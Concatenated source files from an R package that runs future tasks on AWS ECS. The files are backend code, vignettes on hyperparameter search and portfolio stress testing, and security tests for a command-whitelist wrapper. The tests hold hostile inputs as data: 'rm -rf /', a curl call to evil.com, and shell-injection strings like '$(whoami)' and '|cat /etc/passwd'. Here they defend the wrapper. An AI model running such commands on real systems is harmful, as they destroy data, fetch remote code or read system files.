    # For ECS, valid CPU values are: 0.25, 0.5, 1, 2, 4, 8, 16
    # Use the largest valid value that fits on the instance
    valid_cpus <- c(0.25, 0.5, 1, 2, 4, 8, 16)
    cpu <- max(valid_cpus[valid_cpus <= instance_specs$vcpus])

    # Memory: use instance capacity minus 512MB for ECS agent overhead
    memory_gb <- instance_specs$memory_gb - 0.5
    memory <- sprintf("%dGB", floor(memory_gb))

    cat_info(sprintf("   * Using instance resources: %g vCPUs, %s memory\n", cpu, memory))
  }

  # Validate after potential adjustment
  validate_cpu(cpu)
  validate_memory(memory)

  # Get configuration
  config <- get_starburst_config()
  region <- region %||% config$region %||% "us-east-1"

  # Check AWS credentials
  check_aws_credentials()

  # Get architecture from instance type
  architecture <- if (launch_type == "EC2") {
    get_architecture_from_instance_type(instance_type)
  } else {
    "X86_64"  # Fargate default
  }

  # Create cluster identifier
  cluster_id <- sprintf("starburst-%s", uuid::UUIDgenerate())

  # Ensure environment is ready
  env_info <- ensure_environment(region)

  # Create backend state
  backend <- list(
    cluster_id = cluster_id,
    cluster = env_info$cluster,
    cluster_name = config$cluster_name,
    workers = workers,
    cpu = cpu,
    memory = memory,
    region = region,
    bucket = config$bucket,
    timeout = timeout,
    env_hash = env_info$hash,
    image_uri = env_info$image_uri,
    created_at = Sys.time(),
    total_tasks = 0,
    completed_tasks = 0,
    failed_tasks = 0,
    total_cost = 0,
    launch_type = launch_type,
    instance_type = instance_type,
    use_spot = use_spot,
    architecture = architecture,
    warm_pool_timeout = warm_pool_timeout,
    capacity_provider_name = sprintf("starburst-%s", gsub("\\.", "-", instance_type)),
    pool_started_at = NULL,
    asg_name = sprintf("starburst-asg-%s", gsub("\\.", "-", instance_type)),
    aws_account_id = config$aws_account_id,
    # VPC configuration
    subnets = config$subnets,
    security_groups = config$security_groups
  )

  # Convert to environment for mutability
  backend_env <- list2env(backend, parent = emptyenv())

  # Store in options
  options(starburst.current_backend = backend_env)
  options(starburst.current_cluster_id = cluster_id)

  cat_success(sprintf("[OK] Cluster ready: %s\n", cluster_id))

  # Create the backend object using future::FutureBackend
  core <- future::FutureBackend(
    workers = workers,
    reg = "workers-starburst"
  )

  # Store our backend state in the core object
  for (name in names(backend)) {
    core[[name]] <- backend[[name]]
  }

  # Set S3 class hierarchy
  class(core) <- c("StarburstBackend", "FutureBackend", class(core))

  # Store backend_env in options for StarburstFuture to access
  attr(core, "backend") <- backend_env

  core
}


#' Starburst strategy marker
#'
#' This function should never be called directly. Use plan(starburst, ...) instead.
#'
#' @param ... Arguments passed to StarburstBackend()
#' @return Does not return a value; always signals an error if called directly.
#'   This object exists as a strategy marker for \code{\link[future]{plan}}.
#' @export
starburst <- function(...) {
  stop("INTERNAL ERROR: The starburst() function must never be called directly. Use plan(starburst, ...) instead.")
}

# Set class and attributes
class(starburst) <- c("starburst", "future", "function")
attr(starburst, "init") <- TRUE
attr(starburst, "factory") <- StarburstBackend
attr(starburst, "tweakable") <- c("workers", "cpu", "memory", "region", "timeout",
                                  "launch_type", "instance_type", "use_spot",
                                  "warm_pool_timeout")


#' Number of workers for StarburstBackend
#'
#' @param evaluator A StarburstBackend object
#' @return Number of workers
#' @importFrom future nbrOfWorkers
#' @method nbrOfWorkers StarburstBackend
#' @export
nbrOfWorkers.StarburstBackend <- function(evaluator) {
  backend <- evaluator  # Match generic signature
  backend$workers
}


#' List futures for StarburstBackend
#'
#' @param backend A StarburstBackend object
#' @param ... Additional arguments
#' @return List of futures (empty for this backend)
#' @importFrom future listFutures
#' @method listFutures StarburstBackend
#' @export
listFutures.StarburstBackend <- function(backend, ...) {
  # We don't track futures in the backend, they're managed by the future package
  list()
}


#' Launch a future on the Starburst backend
#'
#' @param backend A StarburstBackend object
#' @param future The future object to launch
#' @param ... Additional arguments
#' @return The future object (invisibly)
#' @importFrom future launchFuture
#' @method launchFuture StarburstBackend
#' @export
launchFuture.StarburstBackend <- function(backend, future, ...) {

  # The future should already be created by the future package
  # We just need to submit it to ECS and update its state

  # Get backend environment from options or attribute
  backend_env <- getOption("starburst.current_backend")
  if (is.null(backend_env)) {
    backend_env <- attr(backend, "backend")
  }

  if (is.null(backend_env)) {
    stop("No backend environment found")
  }

  # Generate task ID if not present
  if (is.null(future$task_id)) {
    future$task_id <- sprintf("task-%s", gsub("-", "", uuid::UUIDgenerate()))
  }

  # Serialize task data
  task_data <- list(
    expr = future$expr,
    globals = future$globals,
    packages = future$packages,
    seed = future$seed
  )

  # Upload to S3
  s3 <- get_s3_client(backend_env$region)
  task_key <- sprintf("tasks/%s.qs", future$task_id)
  temp_task_file <- tempfile(fileext = ".qs")
  on.exit(unlink(temp_task_file), add = TRUE)

  qs2::qs_save(task_data, temp_task_file)

  s3$put_object(
    Bucket = backend_env$bucket,
    Key = task_key,
    Body = temp_task_file
  )

  # Submit task to ECS
  ecs <- get_ecs_client(backend_env$region)

  # Get or create task definition
  task_def_arn <- get_or_create_task_definition(backend_env)
  backend_env$task_definition_arn <- task_def_arn

  # Prepare network configuration
  # Note: For EC2, assignPublicIp is not supported and networking comes from instance
  # For FARGATE, assignPublicIp is required for internet access
  awsvpc_config <- list(
    subnets = backend_env$subnets,
    securityGroups = backend_env$security_groups
  )

  # Add assignPublicIp only for Fargate (EC2 doesn't support it)
  if (backend_env$launch_type != "EC2") {
    awsvpc_config$assignPublicIp <- "ENABLED"
  }

  # Prepare run_task parameters
  run_task_params <- list(
    cluster = backend_env$cluster_name,
    taskDefinition = task_def_arn,
    count = 1L,
    networkConfiguration = list(
      awsvpcConfiguration = awsvpc_config
    ),
    overrides = list(
      containerOverrides = list(
        list(
          name = "starburst-worker",
          environment = list(
            list(name = "TASK_ID", value = future$task_id),
            list(name = "S3_BUCKET", value = backend_env$bucket),
            list(name = "AWS_DEFAULT_REGION", value = backend_env$region)
          )
        )
      )
    )
  )

  # Add launch type specific parameters
  if (backend_env$launch_type == "EC2") {
    run_task_params$capacityProviderStrategy <- list(
      list(
        capacityProvider = backend_env$capacity_provider_name,
        weight = 1
      )
    )

    # Start warm pool if not started
    if (is.null(backend_env$pool_started_at)) {
      cat_info("[Setup] Starting warm EC2 pool...\n")
      start_warm_pool(backend_env, backend_env$workers, timeout_seconds = 120)
      backend_env$pool_started_at <- Sys.time()
    }
  } else {
    run_task_params$launchType <- "FARGATE"
  }

  # Submit task
  response <- do.call(ecs$run_task, run_task_params)

  # Check for failures
  if (length(response$failures) > 0) {
    failure <- response$failures[[1]]
    stop(sprintf("Failed to submit task: %s - %s",
                 failure$reason, failure$detail))
  }

  # Store task ARN in future
  if (length(response$tasks) > 0) {
    future$task_arn <- response$tasks[[1]]$taskArn
  }

  # Set the future class so our S3 methods get called
  class(future) <- c("StarburstFuture", "Future", class(future))

  # Update state to running
  future$state <- "running"

  # Track in backend
  backend_env$total_tasks <- backend_env$total_tasks + 1

  invisible(future)
}

## ----include = FALSE----------------------------------------------------------
knitr::opts_chunk$set(
  collapse = TRUE,
  comment = "#>"
)

## ----setup, eval=FALSE--------------------------------------------------------
# library(starburst)

## ----data, eval=FALSE---------------------------------------------------------
# set.seed(2024)
# 
# # Generate features
# n_samples <- 10000
# n_features <- 20
# 
# X <- matrix(rnorm(n_samples * n_features), nrow = n_samples)
# colnames(X) <- paste0("feature_", 1:n_features)
# 
# # Generate target with non-linear relationship
# true_coef <- rnorm(n_features)
# linear_pred <- X %*% true_coef
# prob <- 1 / (1 + exp(-linear_pred))
# y <- rbinom(n_samples, 1, prob)
# 
# # Create train/test split
# train_idx <- sample(1:n_samples, 0.7 * n_samples)
# X_train <- X[train_idx, ]
# y_train <- y[train_idx]
# X_test <- X[-train_idx, ]
# y_test <- y[-train_idx]
# 
# cat(sprintf("Dataset created:\n"))
# cat(sprintf("  Training samples: %s\n", format(length(y_train), big.mark = ",")))
# cat(sprintf("  Test samples: %s\n", format(length(y_test), big.mark = ",")))
# cat(sprintf("  Features: %d\n", n_features))
# cat(sprintf("  Class balance: %.1f%% / %.1f%%\n",
#             mean(y_train) * 100, (1 - mean(y_train)) * 100))

## ----grid, eval=FALSE---------------------------------------------------------
# # Define parameter space
# param_grid <- expand.grid(
#   learning_rate = c(0.01, 0.05, 0.1),
#   max_depth = c(3, 5, 7),
#   subsample = c(0.6, 0.8, 1.0),
#   min_child_weight = c(1, 3, 5),
#   stringsAsFactors = FALSE
# )
# 
# cat(sprintf("Grid search space:\n"))
# cat(sprintf("  Total parameter combinations: %d\n", nrow(param_grid)))
# cat(sprintf("  With 5-fold CV: %d model fits\n\n", nrow(param_grid) * 5))

## ----train-fn, eval=FALSE-----------------------------------------------------
# # Simple gradient boosting implementation (for demonstration)
# # In practice, use xgboost, lightgbm, or other optimized libraries
# train_gbm <- function(X, y, params, n_trees = 50) {
#   # Simplified GBM simulation
#   # This is a mock implementation - in real use, call xgboost, etc.
# 
#   n <- nrow(X)
#   pred <- rep(mean(y), n)  # Initial prediction
# 
#   # Simulate training time based on complexity
#   complexity_factor <- params$max_depth * (1 / params$learning_rate) *
#                       (1 / params$subsample)
#   training_time <- 0.001 * complexity_factor * n_trees
# 
#   Sys.sleep(min(training_time, 5))  # Cap at 5 seconds
# 
#   # Generate mock predictions with some realism
#   pred <- pred + rnorm(n, 0, 0.1)
#   pred <- pmin(pmax(pred, 0), 1)  # Bound to [0, 1]
# 
#   list(predictions = pred, params = params)
# }
# 
# # Cross-validation function
# cv_evaluate <- function(param_row, X_data, y_data, n_folds = 5) {
#   params <- as.list(param_row)
# 
#   # Create folds
#   n <- nrow(X_data)
#   fold_size <- floor(n / n_folds)
#   fold_indices <- sample(rep(1:n_folds, length.out = n))
# 
#   # Perform cross-validation
#   cv_scores <- numeric(n_folds)
# 
#   for (fold in 1:n_folds) {
#     # Split data
#     val_idx <- which(fold_indices == fold)
#     train_idx <- which(fold_indices != fold)
# 
#     X_fold_train <- X_data[train_idx, , drop = FALSE]
#     y_fold_train <- y_data[train_idx]
#     X_fold_val <- X_data[val_idx, , drop = FALSE]
#     y_fold_val <- y_data[val_idx]
# 
#     # Train model
#     model <- train_gbm(X_fold_train, y_fold_train, params)
# 
#     # Predict and evaluate (mock evaluation)
#     # In practice, compute actual predictions and metrics
#     baseline_accuracy <- mean(y_fold_val == round(mean(y_fold_train)))
# 
#     # Simulate performance improvement based on good parameters
#     param_quality <- (params$learning_rate >= 0.05) * 0.02 +
#                     (params$max_depth >= 5) * 0.02 +
#                     (params$subsample >= 0.8) * 0.01 +
#                     rnorm(1, 0, 0.02)
# 
#     accuracy <- min(baseline_accuracy + param_quality, 1.0)
#     cv_scores[fold] <- accuracy
#   }
# 
#   # Return results
#   list(
#     params = params,
#     mean_cv_score = mean(cv_scores),
#     std_cv_score = sd(cv_scores),
#     cv_scores = cv_scores
#   )
# }

## ----local, eval=FALSE--------------------------------------------------------
# # Test with 10 parameter combinations
# set.seed(999)
# sample_params <- param_grid[sample(1:nrow(param_grid), 10), ]
# 
# cat(sprintf("Running local benchmark (%d parameter combinations)...\n",
#             nrow(sample_params)))
# local_start <- Sys.time()
# 
# local_results <- lapply(1:nrow(sample_params), function(i) {
#   cv_evaluate(sample_params[i, ], X_train, y_train, n_folds = 5)
# })
# 
# local_time <- as.numeric(difftime(Sys.time(), local_start, units = "mins"))
# 
# cat(sprintf("[OK] Completed in %.2f minutes\n", local_time))
# cat(sprintf("  Average time per combination: %.1f seconds\n",
#             local_time * 60 / nrow(sample_params)))
# cat(sprintf("  Estimated time for full grid (%d combinations): %.1f minutes\n",
#             nrow(param_grid), local_time * nrow(param_grid) / nrow(sample_params)))

## ----cloud, eval=FALSE--------------------------------------------------------
# n_workers <- 27
# 
# cat(sprintf("Running grid search (%d combinations) on %d workers...\n",
#             nrow(param_grid), n_workers))
# 
# cloud_start <- Sys.time()
# 
# # Batch the parameter rows into ~100 tasks, each evaluating a chunk
# idx <- 1:nrow(param_grid)
# batches <- split(idx, ceiling(seq_along(idx) / ceiling(length(idx) / 100)))
# results <- starburst_map(
#   batches,
#   function(chunk) lapply(chunk, function(i) {
#     cv_evaluate(param_grid[i, ], X_train, y_train, n_folds = 5)
#   }),
#   workers = n_workers,
#   cpu = 2,
#   memory = "4GB"
# )
# results <- unlist(results, recursive = FALSE)  # flatten to one result per combination
# 
# cloud_time <- as.numeric(difftime(Sys.time(), cloud_start, units = "mins"))
# 
# cat(sprintf("\n[OK] Completed in %.2f minutes\n", cloud_time))

## ----analysis, eval=FALSE-----------------------------------------------------
# # Extract results
# cv_scores <- sapply(results, function(x) x$mean_cv_score)
# cv_stds <- sapply(results, function(x) x$std_cv_score)
# 
# # Combine with parameters
# results_df <- cbind(param_grid,
#                    mean_score = cv_scores,
#                    std_score = cv_stds)
# 
# # Sort by performance
# results_df <- results_df[order(-results_df$mean_score), ]
# 
# cat("\n=== Grid Search Results ===\n\n")
# cat(sprintf("Total combinations evaluated: %d\n", nrow(results_df)))
# cat(sprintf("Best CV score: %.4f (± %.4f)\n",
#             results_df$mean_score[1], results_df$std_score[1]))
# 
# cat("\n=== Best Hyperparameters ===\n")
# cat(sprintf("  Learning rate: %.3f\n", results_df$learning_rate[1]))
# cat(sprintf("  Max depth: %d\n", results_df$max_depth[1]))
# cat(sprintf("  Subsample: %.2f\n", results_df$subsample[1]))
# cat(sprintf("  Min child weight: %d\n", results_df$min_child_weight[1]))
# 
# cat("\n=== Top 5 Parameter Combinations ===\n")
# for (i in 1:5) {
#   cat(sprintf("\n%d. Score: %.4f (± %.4f)\n", i,
#               results_df$mean_score[i], results_df$std_score[i]))
#   cat(sprintf("   lr=%.3f, depth=%d, subsample=%.2f, min_child=%d\n",
#               results_df$learning_rate[i],
#               results_df$max_depth[i],
#               results_df$subsample[i],
#               results_df$min_child_weight[i]))
# }
# 
# # Parameter importance analysis
# cat("\n=== Parameter Impact Analysis ===\n")
# for (param in c("learning_rate", "max_depth", "subsample", "min_child_weight")) {
#   param_means <- aggregate(mean_score ~ get(param),
#                           data = results_df, FUN = mean)
#   names(param_means)[1] <- param
# 
#   cat(sprintf("\n%s:\n", param))
#   for (i in 1:nrow(param_means)) {
#     cat(sprintf("  %s: %.4f\n",
#                 param_means[i, 1],
#                 param_means[i, 2]))
#   }
# }
# 
# # Visualize results (if in interactive session)
# if (interactive()) {
#   # Score distribution
#   hist(results_df$mean_score,
#        breaks = 20,
#        main = "Distribution of Cross-Validation Scores",
#        xlab = "Mean CV Score",
#        col = "lightblue",
#        border = "white")
#   abline(v = results_df$mean_score[1], col = "red", lwd = 2, lty = 2)
# 
#   # Learning rate effect
#   boxplot(mean_score ~ learning_rate, data = results_df,
#           main = "Learning Rate Impact",
#           xlab = "Learning Rate",
#           ylab = "CV Score",
#           col = "lightgreen")
# }

## ----random-search, eval=FALSE------------------------------------------------
# # Generate random parameter combinations
# n_random <- 100
# 
# random_params <- data.frame(
#   learning_rate = runif(n_random, 0.001, 0.3),
#   max_depth = sample(2:10, n_random, replace = TRUE),
#   subsample = runif(n_random, 0.5, 1.0),
#   min_child_weight = sample(1:10, n_random, replace = TRUE),
#   stringsAsFactors = FALSE
# )
# 
# cat(sprintf("Running random search (%d combinations)...\n", n_random))
# 
# random_results <- starburst_map(
#   1:nrow(random_params),
#   function(i) cv_evaluate(random_params[i, ], X_train, y_train, n_folds = 5),
#   workers = 33,
#   cpu = 2,
#   memory = "4GB"
# )
# 
# # Find best parameters
# random_scores <- sapply(random_results, function(x) x$mean_cv_score)
# best_idx <- which.max(random_scores)
# 
# cat("\nBest random search result:\n")
# cat(sprintf("  Score: %.4f\n", random_scores[best_idx]))
# cat(sprintf("  Learning rate: %.4f\n", random_params$learning_rate[best_idx]))
# cat(sprintf("  Max depth: %d\n", random_params$max_depth[best_idx]))

## ----bayesian, eval=FALSE-----------------------------------------------------
# # Bayesian optimization would involve:
# # 1. Evaluate a small initial set (e.g., 10 combinations)
# # 2. Fit a Gaussian process to predict performance
# # 3. Use acquisition function to select next promising points
# # 4. Evaluate new points in parallel
# # 5. Repeat until convergence
# 
# # This requires specialized packages like mlrMBO or rBayesianOptimization
# # but can be parallelized with starburst for the evaluation step

## ----eval=FALSE---------------------------------------------------------------
# system.file("examples/grid-search.R", package = "starburst")

## ----eval=FALSE---------------------------------------------------------------
# source(system.file("examples/grid-search.R", package = "starburst"))

#' Utility functions for staRburst
#'
#' General-purpose helpers shared across the package. AWS-specific helpers live
#' in dedicated files: \code{aws-clients.R} (service clients), \code{cost.R}
#' (pricing), \code{images.R} (ECR/Docker), \code{task-definition.R} (ECS task
#' defs), \code{network.R} (VPC), \code{task-registry.R} (task ARNs), and
#' \code{s3-io.R} (S3 task/result transfer).
#'
#' @name utils
#' @keywords internal
NULL

#' Execute system command safely (no shell injection)
#'
#' @param command Command to execute (must be in whitelist)
#' @param args Character vector of arguments
#' @param allowed_commands Commands allowed to be executed
#' @param stdin Optional input to pass to stdin
#' @param ... Additional arguments passed to processx::run()
#' @return Result from processx::run()
#' @keywords internal
safe_system <- function(command,
                       args = character(),
                       allowed_commands = c("docker", "aws", "uname", "sysctl", "cat", "nproc"),
                       stdin = NULL,
                       stdout = "|",
                       stderr = "|",
                       ...) {
  # Validate command whitelist
  if (!command %in% allowed_commands) {
    stop(sprintf("Command not in whitelist: %s. Allowed: %s",
                 command, paste(allowed_commands, collapse = ", ")))
  }

  # Convert boolean stdout/stderr to processx format (TRUE = capture, FALSE = discard)
  if (isTRUE(stdout)) stdout <- "|"
  if (isFALSE(stdout)) stdout <- ""
  if (isTRUE(stderr)) stderr <- "|"
  if (isFALSE(stderr)) stderr <- ""

  # If stdin is a string that isn't a file path, write it to a temp file
  # processx::run() treats stdin as a file path, not file content
  stdin_file <- NULL
  if (!is.null(stdin) && stdin != "|" && !file.exists(stdin)) {
    stdin_file <- tempfile()
    writeLines(stdin, stdin_file)
    on.exit(unlink(stdin_file), add = TRUE)
    stdin <- stdin_file
  }

  # Use processx - automatically escapes, no shell
  result <- processx::run(
    command = command,
    args = args,
    stdin = stdin,
    stdout = stdout,
    stderr = stderr,
    error_on_status = FALSE,
    ...
  )

  if (result$status != 0) {
    stop(sprintf("Command '%s %s' failed (exit code %d):\n%s",
                 command, paste(args, collapse = " "),
                 result$status, result$stderr))
  }

  result
}

#' Infix null-coalesce operator
#'
#' @keywords internal
#' @noRd
`%||%` <- function(a, b) {
  if (is.null(a)) b else a
}

#' Get CPU architecture from instance type
#'
#' @param instance_type EC2 instance type (e.g., "c7g.xlarge", "c7i.xlarge", "c7a.xlarge")
#' @return CPU architecture ("ARM64" or "X86_64")
#' @keywords internal
get_architecture_from_instance_type <- function(instance_type) {
  # Graviton instances end with 'g' in the instance family
  # Examples: c7g/c8g (Graviton3/4), t4g, r7g/r8g, m7g/m8g
  #
  # Intel/AMD instances use other suffixes:
  # - 'i' = Intel (c7i, c8i)
  # - 'a' = AMD (c8a, c7a, c6a - 8th/7th/6th gen)
  # - 'n' = Network optimized
  #
  # Best price/performance (Feb 2026): c8a > c8g > c7a
  if (grepl("^[cmrt][0-9]+g\\.", instance_type)) {
    return("ARM64")
  } else {
    return("X86_64")
  }
}

#' Get instance specifications (vCPUs, memory)
#'
#' @keywords internal
get_instance_specs <- function(instance_type) {
  # Common instance type specs
  # Format: "family.size" -> c(vcpus, memory_gb)
  specs_map <- list(
    # C6a (AMD, 3rd gen EPYC)
    "c6a.large" = c(2, 4),
    "c6a.xlarge" = c(4, 8),
    "c6a.2xlarge" = c(8, 16),
    "c6a.4xlarge" = c(16, 32),
    # C7a (AMD, 4th gen EPYC)
    "c7a.large" = c(2, 4),
    "c7a.xlarge" = c(4, 8),
    "c7a.2xlarge" = c(8, 16),
    "c7a.4xlarge" = c(16, 32),
    # C7g (Graviton3)
    "c7g.large" = c(2, 4),
    "c7g.xlarge" = c(4, 8),
    "c7g.2xlarge" = c(8, 16),
    "c7g.4xlarge" = c(16, 32),
    # C7i (Intel)
    "c7i.large" = c(2, 4),
    "c7i.xlarge" = c(4, 8),
    "c7i.2xlarge" = c(8, 16),
    "c7i.4xlarge" = c(16, 32)
  )

  if (!instance_type %in% names(specs_map)) {
    stop(sprintf("Unknown instance type: %s. Supported types: %s",
                 instance_type, paste(names(specs_map), collapse = ", ")))
  }

  specs <- specs_map[[instance_type]]
  list(
    vcpus = specs[1],
    memory_gb = specs[2]
  )
}

test_that("safe_system validates command whitelist", {
  # Commands not in whitelist should fail
  expect_error(
    safe_system("rm", c("-rf", "/")),
    "Command not in whitelist: rm"
  )

  expect_error(
    safe_system("curl", c("https://evil.com/script.sh")),
    "Command not in whitelist: curl"
  )

  # Allowed commands should work (if installed)
  skip_if_not(Sys.which("docker") != "", "Docker not installed")
  expect_no_error(
    safe_system("docker", c("--version"))
  )
})

test_that("safe_system prevents command injection in arguments", {
  skip_if_not(Sys.which("docker") != "", "Docker not installed")
  skip_if_not(
    tryCatch({ processx::run("docker", "info", error_on_status = FALSE)$status == 0 },
             error = function(e) FALSE),
    "Docker daemon not running"
  )

  # Malicious arguments with shell metacharacters should be safely escaped
  # This should NOT execute the injected command
  malicious_arg <- "test; echo 'INJECTED' > /tmp/starburst-injection-test"

  # safe_system should treat this as a literal argument, not execute the injection
  # Docker will fail on the malformed tag, but the injection won't run
  expect_error(
    safe_system("docker", c("build", "-t", malicious_arg, ".")),
    "failed"  # Docker will fail, not the injection executing
  )

  # Verify injection didn't run
  expect_false(file.exists("/tmp/starburst-injection-test"))

  # Try other shell metacharacters
  malicious_args <- c(
    "tag`rm -rf /tmp/test`",
    "tag$(whoami)",
    "tag&&echo hack",
    "tag||echo hack",
    "tag|cat /etc/passwd"
  )

  for (arg in malicious_args) {
    # All should fail safely (docker error, not shell execution)
    expect_error(
      safe_system("docker", c("images", arg)),
      # processx will fail because these aren't valid arguments
      # but won't execute shell commands
      NA  # Just expect an error, don't care about message
    )
  }
})

test_that("worker count validation enforced", {
  # Negative workers
  expect_error(
    validate_workers(-5),
    "positive number"
  )

  # Zero workers
  expect_error(
    validate_workers(0),
    "positive number"
  )

  # Too many workers
  expect_error(
    validate_workers(1000),
    "Workers must be <= 500"
  )

  expect_error(
    validate_workers(10000),
    "Workers must be <= 500"
  )

  # Valid worker counts should pass
  expect_silent(validate_workers(1))
  expect_silent(validate_workers(50))
  expect_silent(validate_workers(100))
  expect_silent(validate_workers(500))  # Exactly at limit
})

test_that("safe_system handles stdin securely", {
  skip("stdin test requires specific system configuration")

  # Note: The actual security of stdin handling is verified by:
  # 1. processx using proper escaping and no shell expansion
  # 2. Docker login tests which pass password via stdin
  # 3. Command injection tests which verify arguments are escaped

  # This test would verify stdin behavior but requires platform-specific
  # command availability that may not be present in all test environments
})

test_that("plan() respects worker limits", {
  skip_on_cran()
  skip_if_offline()

  # This should fail due to worker validation
  expect_error(
    plan(starburst, workers = 1000),
    "Workers must be <= 500"
  )

  # Valid plan should work (validation passes, might fail on other things)
  # We're just testing validation here
  expect_error(
    suppressMessages(validate_workers(100)),
    NA  # No error expected
  )
})

test_that("Docker commands use safe_system not shell commands", {
  # Scan all package R source files for unsafe shell patterns. Docker calls
  # live in R/images.R; other AWS helpers are spread across several files, so
  # we check the whole R/ directory rather than a single hard-coded file.
  #
  # Candidate locations, in order: the dev source tree (devtools::test()),
  # the R CMD check unpacked source, and the installed package. The installed
  # package's R/ holds only compiled .rdb/.rdx (no .R source), so we accept a
  # directory only if it actually contains .R files.
  candidate_dirs <- c(
    "../../R",                       # From tests/testthat during devtools::test()
    "../00_pkg_src/starburst/R",     # From R CMD check temp directory
    system.file("R", package = "starburst")
  )

  r_files <- character(0)
  for (dir in candidate_dirs) {
    if (nzchar(dir) && dir.exists(dir)) {
      found <- list.files(dir, pattern = "[.]R$", full.names = TRUE)
      if (length(found) > 0) {
        r_files <- found
        break
      }
    }
  }

  # Skip if no R source is available (e.g. installed-package check, where the
  # source has been compiled away and only .rdb/.rdx remain).
  if (length(r_files) == 0) {
    skip("Cannot locate package R source files")
  }

  r_content <- unlist(lapply(r_files, readLines, warn = FALSE))

  # Should NOT contain:
  # - system() with sprintf() building commands
  # - Shell redirection operators in Docker commands
  # - Unquoted variable interpolation in shell commands

  # Look for dangerous patterns
  dangerous_patterns <- c(
    'system\\(sprintf\\(',  # system(sprintf(...)) is dangerous
    'system\\("docker.*<',  # Shell redirection
    'system\\("docker.*\\|\\|',  # Shell OR
    'system\\("docker.*&&'  # Shell AND
  )

  for (pattern in dangerous_patterns) {
    matches <- grep(pattern, r_content, value = TRUE)
    expect_equal(
      length(matches),
      0,
      info = sprintf("Found unsafe pattern '%s' in package R source:\n%s",
                    pattern, paste(matches, collapse = "\n"))
    )
  }

  # Should contain safe_system calls for Docker
  expect_true(
    any(grepl('safe_system\\("docker"', r_content)),
    info = "Package R source should use safe_system() for Docker commands"
  )
})

## ----include = FALSE----------------------------------------------------------
knitr::opts_chunk$set(
  collapse = TRUE,
  comment = "#>"
)

## ----setup, eval=FALSE--------------------------------------------------------
# library(starburst)

## ----data, eval=FALSE---------------------------------------------------------
# set.seed(3141)
# 
# # Define portfolio positions
# n_assets <- 50
# 
# portfolio <- data.frame(
#   asset_id = 1:n_assets,
#   asset_name = paste0("Asset_", 1:n_assets),
#   asset_class = sample(c("Equity", "Bond", "Commodity", "FX", "Option"),
#                       n_assets, replace = TRUE,
#                       prob = c(0.4, 0.3, 0.1, 0.1, 0.1)),
#   position_value = rlnorm(n_assets, log(1000000), 1),
#   beta = rnorm(n_assets, 1.0, 0.3),  # Market beta
#   duration = ifelse(
#     sample(c("Equity", "Bond", "Commodity", "FX", "Option"),
#            n_assets, replace = TRUE,
#            prob = c(0.4, 0.3, 0.1, 0.1, 0.1)) == "Bond",
#     runif(n_assets, 1, 10), 0
#   ),
#   delta = runif(n_assets, 0.3, 0.7),  # Options delta
#   vega = runif(n_assets, 10000, 50000),  # Options vega
#   stringsAsFactors = FALSE
# )
# 
# total_portfolio_value <- sum(portfolio$position_value)
# 
# cat(sprintf("Portfolio Summary:\n"))
# cat(sprintf("  Total value: $%.0f\n", total_portfolio_value))
# cat(sprintf("  Number of positions: %d\n", n_assets))
# cat(sprintf("  Asset classes: %s\n",
#             paste(unique(portfolio$asset_class), collapse = ", ")))
# 
# # Breakdown by asset class
# cat(sprintf("\nAllocation by asset class:\n"))
# for (ac in unique(portfolio$asset_class)) {
#   pct <- sum(portfolio$position_value[portfolio$asset_class == ac]) /
#          total_portfolio_value * 100
#   cat(sprintf("  %s: %.1f%%\n", ac, pct))
# }

## ----scenarios, eval=FALSE----------------------------------------------------
# # Generate stress test scenarios
# generate_stress_scenarios <- function(n_scenarios = 100) {
#   scenarios <- list()
# 
#   for (i in 1:n_scenarios) {
#     # Define adverse market moves
#     scenario <- list(
#       scenario_id = i,
#       scenario_type = "stress_test",
#       equity_shock = rnorm(1, -0.15, 0.05),  # Average -15% with volatility
#       rate_shock = rnorm(1, 0.02, 0.01),     # +200bps average
#       vol_shock = rnorm(1, 0.5, 0.2),        # +50% volatility
#       fx_shock = rnorm(1, -0.05, 0.03),      # -5% average
#       commodity_shock = rnorm(1, -0.10, 0.05)
#     )
#     scenarios[[i]] <- scenario
#   }
# 
#   scenarios
# }
# 
# # Generate Monte Carlo scenarios
# generate_mc_scenarios <- function(n_scenarios = 1000) {
#   scenarios <- list()
# 
#   for (i in 1:n_scenarios) {
#     scenario <- list(
#       scenario_id = 1000 + i,
#       scenario_type = "monte_carlo",
#       equity_shock = rnorm(1, 0, 0.10),
#       rate_shock = rnorm(1, 0, 0.005),
#       vol_shock = rnorm(1, 0, 0.2),
#       fx_shock = rnorm(1, 0, 0.05),
#       commodity_shock = rnorm(1, 0, 0.12)
#     )
#     scenarios[[i]] <- scenario
#   }
# 
#   scenarios
# }
# 
# # Generate sensitivity scenarios (grid around current values)
# generate_sensitivity_scenarios <- function() {
#   scenarios <- list()
#   scenario_id <- 20000
# 
#   risk_factors <- c("equity", "rate", "vol", "fx", "commodity")
#   shock_levels <- seq(-0.02, 0.02, by = 0.005)  # -2% to +2% in 0.5% steps
# 
#   for (factor in risk_factors) {
#     for (shock in shock_levels) {
#       scenario_id <- scenario_id + 1
# 
#       scenario <- list(
#         scenario_id = scenario_id,
#         scenario_type = "sensitivity",
#         risk_factor = factor,
#         equity_shock = if (factor == "equity") shock else 0,
#         rate_shock = if (factor == "rate") shock else 0,
#         vol_shock = if (factor == "vol") shock else 0,
#         fx_shock = if (factor == "fx") shock else 0,
#         commodity_shock = if (factor == "commodity") shock else 0
#       )
#       scenarios[[length(scenarios) + 1]] <- scenario
#     }
#   }
# 
#   scenarios
# }

## ----valuation, eval=FALSE----------------------------------------------------
# value_portfolio_scenario <- function(scenario, portfolio_data) {
#   # Simulate computation time
#   Sys.sleep(0.001)
# 
#   # Calculate position-level P&L
#   position_pnl <- numeric(nrow(portfolio_data))
# 
#   for (i in 1:nrow(portfolio_data)) {
#     asset <- portfolio_data[i, ]
# 
#     # Apply shocks based on asset class
#     pnl <- 0
# 
#     if (asset$asset_class == "Equity") {
#       # Equity: affected by equity shock and beta
#       pnl <- asset$position_value * scenario$equity_shock * asset$beta
#     } else if (asset$asset_class == "Bond") {
#       # Bond: affected by rate shock and duration
#       pnl <- -asset$position_value * scenario$rate_shock * asset$duration
#     } else if (asset$asset_class == "Commodity") {
#       # Commodity: direct commodity shock
#       pnl <- asset$position_value * scenario$commodity_shock
#     } else if (asset$asset_class == "FX") {
#       # FX: direct fx shock
#       pnl <- asset$position_value * scenario$fx_shock
#     } else if (asset$asset_class == "Option") {
#       # Option: delta and vega exposure
#       pnl <- asset$position_value * scenario$equity_shock * asset$delta +
#              asset$vega * scenario$vol_shock
#     }
# 
#     position_pnl[i] <- pnl
#   }
# 
#   # Aggregate results
#   total_pnl <- sum(position_pnl)
